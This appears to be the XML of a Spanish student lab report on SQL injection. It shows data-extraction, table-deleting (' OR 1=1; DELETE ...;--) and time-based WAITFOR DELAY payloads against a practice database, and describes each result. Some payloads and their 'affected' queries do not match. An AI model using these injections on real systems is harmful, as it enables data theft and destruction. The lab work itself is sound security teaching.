        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidR="00817732" w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejecute una inyección SQL de extracción de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCD8E5" w14:textId="16B943AB" w:rsidR="00F5488C" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta original:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A43AD8" w14:textId="054E9771" w:rsidR="002D27C9" w:rsidRPr="001E64CA" w:rsidRDefault="002D27C9">
      <w:r w:rsidRPr="001E64CA">
        <w:t xml:space="preserve">SELECT * FROM Cliente WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E64CA">
        <w:t>nombre_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E64CA">
        <w:t xml:space="preserve"> = ' + @nombre;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A1EE3" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrada maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411FD8C" w14:textId="0D9917B8" w:rsidR="002D27C9" w:rsidRDefault="002D27C9">
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">''''' OR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>nombre_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve"> = (SELECT TOP 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>nombre_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve"> FROM Empleado)--''''';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1524D0" w14:textId="431CF108" w:rsidR="002D27C9" w:rsidRPr="00CC77F1" w:rsidRDefault="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta afectada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716290D5" w14:textId="46A33368" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '' OR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (SELECT TOP 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00817732">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00817732" w:rsidRPr="001E64CA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CADAB" w14:textId="19391419" w:rsidR="00F5488C" w:rsidRDefault="00F5488C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC4CB9D" wp14:editId="531F89B3">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="6084916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9168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CF5A" w14:textId="0EAA1585" w:rsidR="00F5488C" w:rsidRDefault="00F5488C">
      <w:r>
        <w:t xml:space="preserve">Con base al nombre, me </w:t>
      </w:r>
      <w:r w:rsidR="001E64CA">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> diciendo que en la tabla Empleado existen registros con el mismo nombre, por lo que me devuelven los registros de </w:t>
      </w:r>
      <w:r w:rsidR="00817732">
        <w:t>acuerdo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con la tabla Cliente. La inyección de extracción de datos es correcta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC12C0" w14:textId="77777777" w:rsidR="00F5488C" w:rsidRDefault="00F5488C"/>
    <w:p w14:paraId="64897670" w14:textId="77777777" w:rsidR="00817732" w:rsidRDefault="00817732">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79081515" w14:textId="72198017" w:rsidR="00F5488C" w:rsidRPr="00817732" w:rsidRDefault="00F5488C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidR="00817732" w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00817732" w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ejecute una inyección SQL de eliminación de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2A693" w14:textId="6B7A27AA" w:rsidR="00CC77F1" w:rsidRPr="008029F7" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008029F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta original:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C1CB8" w14:textId="04BBA08B" w:rsidR="00CC77F1" w:rsidRPr="008029F7" w:rsidRDefault="00CC77F1">
      <w:r w:rsidRPr="008029F7">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>NuevoRegistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008029F7">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>nombre_nregistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008029F7">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>nombre_registro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B91FE" w14:textId="54C7BCC4" w:rsidR="00CC77F1" w:rsidRPr="008029F7" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008029F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrada maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862C9B5" w14:textId="37929EBA" w:rsidR="00CC77F1" w:rsidRPr="001E64CA" w:rsidRDefault="00CC77F1">
      <w:r w:rsidRPr="001E64CA">
        <w:t>' OR 1=1; DELETE FROM Cliente;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC89F6" w14:textId="13657067" w:rsidR="00CC77F1" w:rsidRPr="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta afectada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF3215" w14:textId="343E30DB" w:rsidR="00F5488C" w:rsidRPr="00CC77F1" w:rsidRDefault="00F5488C">
      <w:r w:rsidRPr="00CC77F1">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="00CC77F1">
        <w:t>NuevoRegistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:t>nombre_</w:t>
      </w:r>
      <w:r w:rsidR="002D27C9" w:rsidRPr="00CC77F1">
        <w:t>nregistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:t xml:space="preserve"> = '' OR 1=1; DELETE FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="00CC77F1">
        <w:t>NuevoRegistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:t>;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E72230" w14:textId="77777777" w:rsidR="00F5488C" w:rsidRDefault="00F5488C"/>
    <w:p w14:paraId="1241F5FF" w14:textId="0786F54E" w:rsidR="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F7D779E" wp14:editId="2C1EA316">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="106095378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53787" name="Imagen 1" descr="Una captura de pantalla de una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11B7" w14:textId="0AB9C405" w:rsidR="006A000C" w:rsidRDefault="006A000C" w:rsidP="006A000C">
      <w:r>
        <w:t xml:space="preserve">Primeramente, me muestra los registros contenidos dentro de la tabla, en este caso un sol registro esta almacenado en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nu</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC77F1">
        <w:t>evoRegistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y es el que se elimina de acuerdo con la inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBC7AD0" w14:textId="179F3F50" w:rsidR="00F5488C" w:rsidRDefault="00F5488C">
      <w:r>
        <w:t>Comprobamos con:</w:t>
      </w:r>
      <w:r w:rsidR="006A000C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F5488C">
        <w:t xml:space="preserve">SELECT COUNT(*) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9">
        <w:t>NuevoRegistro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F5488C">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360FA59" w14:textId="4A722DBC" w:rsidR="00F5488C" w:rsidRDefault="006A000C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="195165E2" wp14:editId="3DB1D541">
            <wp:extent cx="2456597" cy="1080112"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="17115880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88065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4708" cy="108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C353" w14:textId="6BB9B32D" w:rsidR="006647FE" w:rsidRPr="00F5488C" w:rsidRDefault="00F5488C">
      <w:r>
        <w:t>Nos regresa 0, que es lo mismo a que no existen registros en la tabla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA58991" w14:textId="0EBEBC6E" w:rsidR="00CC77F1" w:rsidRPr="006A000C" w:rsidRDefault="006A000C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A000C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00CC77F1" w:rsidRPr="006A000C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006A000C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ejecute una inyección SQL basada en el tiempo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142778A" w14:textId="4964D2A1" w:rsidR="00CC77F1" w:rsidRPr="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta original:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ABA71C" w14:textId="5F18CB1E" w:rsidR="00CC77F1" w:rsidRPr="006A000C" w:rsidRDefault="00CC77F1">
      <w:r w:rsidRPr="006A000C">
        <w:t xml:space="preserve">SELECT * FROM Cliente WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A000C">
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A000C">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A000C" w:rsidRPr="006A000C">
        <w:t>correo_del_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A000C">
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E5831" w14:textId="64861D69" w:rsidR="00CC77F1" w:rsidRPr="006A000C" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A000C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrada maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5C31A" w14:textId="77777777" w:rsidR="00CC77F1" w:rsidRPr="00CC77F1" w:rsidRDefault="00CC77F1" w:rsidP="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>''''' OR 1=1; WAITFOR DELAY ''00:00:05'';--''';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256842C8" w14:textId="3CA3FF68" w:rsidR="00CC77F1" w:rsidRPr="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Consulta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>afectada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14428C69" w14:textId="0C66F3A6" w:rsidR="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ' OR 1=1; WAITFOR DELAY '00:00:05';</w:t>
      </w:r>
      <w:r w:rsidR="006A000C" w:rsidRPr="006A000C">
        <w:t>--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A00F840" w14:textId="407DA22B" w:rsidR="006A000C" w:rsidRDefault="006A000C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EC32CBB" wp14:editId="1E770782">
            <wp:extent cx="5569244" cy="238836"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="19267708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7081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4"/>
                    <a:srcRect l="20921" t="86290" r="16494" b="8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176" cy="258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6A3D2" w14:textId="5BC00251" w:rsidR="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7025C8B8" wp14:editId="012D6F56">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="12563315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31507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BD06" w14:textId="2E6878C0" w:rsidR="006A000C" w:rsidRPr="006A000C" w:rsidRDefault="006A000C">
      <w:r w:rsidRPr="006A000C">
        <w:t>Cuando se ejecuta la consulta a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fectada, se tarda cinco segundos en que me regrese los resultados. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006A000C" w:rsidRPr="006A000C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F8D92" w14:textId="77777777" w:rsidR="00330DE0" w:rsidRDefault="00330DE0" w:rsidP="008029F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C1DCF60" w14:textId="77777777" w:rsidR="00330DE0" w:rsidRDefault="00330DE0" w:rsidP="00802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7B300" w14:textId="77777777" w:rsidR="00330DE0" w:rsidRDefault="00330DE0" w:rsidP="008029F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="444E7E6A" w14:textId="77777777" w:rsidR="00330DE0" w:rsidRDefault="00330DE0" w:rsidP="00802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5797B" w14:textId="45608656" w:rsidR="008029F7" w:rsidRPr="008029F7" w:rsidRDefault="008029F7" w:rsidP="008029F7">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="es-ES"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="008029F7">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="es-ES"/>
      </w:rPr>
      <w:t>Práctica 4 “Inyecciones SQL”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35B9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB209076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75E4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F724DDE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138725">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1436947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81"/>
    <w:rsid w:val="00005CC2"/>
    <w:rsid w:val="000F5C81"/>
    <w:rsid w:val="001E64CA"/>
    <w:rsid w:val="002D27C9"/>
    <w:rsid w:val="00330DE0"/>
    <w:rsid w:val="00377507"/>
    <w:rsid w:val="0059510A"/>
    <w:rsid w:val="00643EE5"/>
    <w:rsid w:val="006647FE"/>
    <w:rsid w:val="006A000C"/>
    <w:rsid w:val="008029F7"/>
    <w:rsid w:val="00817732"/>
    <w:rsid w:val="008A5FFF"/>
    <w:rsid w:val="00912C1C"/>
    <w:rsid w:val="009623D3"/>
    <w:rsid w:val="0096717C"/>
    <w:rsid w:val="009D132B"/>
    <w:rsid w:val="00C46673"/>
    <w:rsid w:val="00CC77F1"/>
    <w:rsid w:val="00EA0B52"/>
    <w:rsid w:val="00F5488C"/>
    <w:rsid w:val="00F6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744B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C714ADFD-A7C6-45CB-876C-1AC6A82F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5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5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5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5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5C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C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5C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5C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5C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5C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5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5C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5C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5C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5C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5C8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029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29F7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008029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29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497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Montse Morales</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Montse Morales</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-04T20:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-15T16:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>